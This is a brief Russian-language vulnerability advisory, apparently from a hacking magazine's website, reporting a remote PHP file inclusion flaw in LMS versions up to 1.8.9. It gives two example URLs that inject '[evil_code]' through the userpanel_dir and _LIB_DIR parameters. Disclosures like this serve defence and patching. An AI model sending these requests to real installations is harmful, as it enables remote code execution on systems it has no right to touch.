Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: LMS <= 1.8.9
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Пример:
http://strona.pl/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=[evil_code]
http://strona.pl/lms_path/modules/welcome.php?_LIB_DIR=[evil_code]